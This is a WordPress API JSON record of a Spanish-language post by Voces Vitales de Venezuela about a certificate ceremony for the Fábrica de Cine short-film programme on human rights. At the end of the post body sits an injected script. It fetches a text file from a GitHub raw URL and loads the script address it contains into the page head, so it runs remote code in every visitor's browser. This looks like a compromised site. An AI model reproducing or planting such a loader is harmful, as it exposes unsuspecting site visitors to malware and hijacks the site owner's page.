{"id":3848,"date":"2024-01-30T14:33:27","date_gmt":"2024-01-30T19:03:27","guid":{"rendered":"https:\/\/vocesvitalesvenezuela.org\/site\/?p=3848"},"modified":"2024-07-25T05:14:00","modified_gmt":"2024-07-25T09:44:00","slug":"certificacion-a-los-participantes-del-programa-fabrica-de-cine","status":"publish","type":"post","link":"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3848","title":{"rendered":"\u00abCertificaci\u00f3n a los participantes del programa F\u00e1brica de Cine\u00bb"},"content":{"rendered":"<p style=\"text-align: justify;\"><img loading=\"lazy\" class=\"size-medium wp-image-3849 alignleft\" src=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/1-1-300x155.jpg\" alt=\"\" width=\"300\" height=\"155\" srcset=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/1-1-300x155.jpg 300w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/1-1-1024x530.jpg 1024w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/1-1-768x398.jpg 768w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/1-1.jpg 1080w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p style=\"text-align: justify;\">El pasado viernes 26 de enero, <strong>Adela Vivas<\/strong> Presidenta de <strong>Voces Vitales de Venezuela<\/strong> acompa\u00f1\u00f3 a nuestros aliados del <strong>Circuito Gran Cine<\/strong> en la entrega de <em><strong>certificados a los participantes del Programa F\u00e1brica de Cine<\/strong><\/em>, quienes realizaron<strong> 9<\/strong> cortometrajes sobre <strong><em>Derechos Humanos y Cultura para la paz<\/em><\/strong>, exhibidos en el Auditorio de la <strong>Universidad Cat\u00f3lica Andr\u00e9s Bello.<\/strong><\/p>\n<p style=\"text-align: justify;\">Durante el evento, se destac\u00f3 el talento y la dedicaci\u00f3n de los participantes de <strong>F\u00e1brica de Cine<\/strong>, quienes han logrado plasmar a trav\u00e9s de sus cortometrajes mensajes poderosos y conmovedores sobre los derechos humanos y la necesidad de construir cultura de paz en Venezuela.<\/p>\n<p style=\"text-align: justify;\"><strong>VVV<\/strong>, una organizaci\u00f3n comprometida con el empoderamiento de la mujer, reconoce la importancia del arte y la cultura como herramientas efectivas para promover la conciencia social y generar un impacto positivo en la sociedad. Por ello, nos sentimos orgullosos de haber formado parte de esta alianza, la cual busca fomentar el respeto y la <strong>equidad de g\u00e9nero a trav\u00e9s del cine y la literatura<\/strong>.<\/p>\n<p style=\"text-align: justify;\">Queremos expresar nuestro agradecimiento a la <strong>Embajada Alemana en Venezuela<\/strong> por su apoyo incondicional en la realizaci\u00f3n de este proyecto. Sin su colaboraci\u00f3n, no habr\u00eda sido posible llevar a cabo esta experiencia tan enriquecedora y significativa.<\/p>\n<p style=\"text-align: justify;\"><strong>#Certificacion #Cortometrajes\u00a0#UCAB<\/strong><\/p>\n<p><script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El pasado viernes 26 de enero, Adela Vivas Presidenta de Voces Vitales de Venezuela acompa\u00f1\u00f3 a nuestros aliados del Circuito Gran Cine en la entrega de certificados a los participantes del Programa F\u00e1brica de Cine, quienes realizaron 9 cortometrajes sobre&hellip; <a href=\"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3848\" class=\"more-link\">Continuar leyendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":3849,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[542,5,16],"tags":[],"_links":{"self":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3848"}],"collection":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3848"}],"version-history":[{"count":0,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3848\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/media\/3849"}],"wp:attachment":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3848"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3848"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3848"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}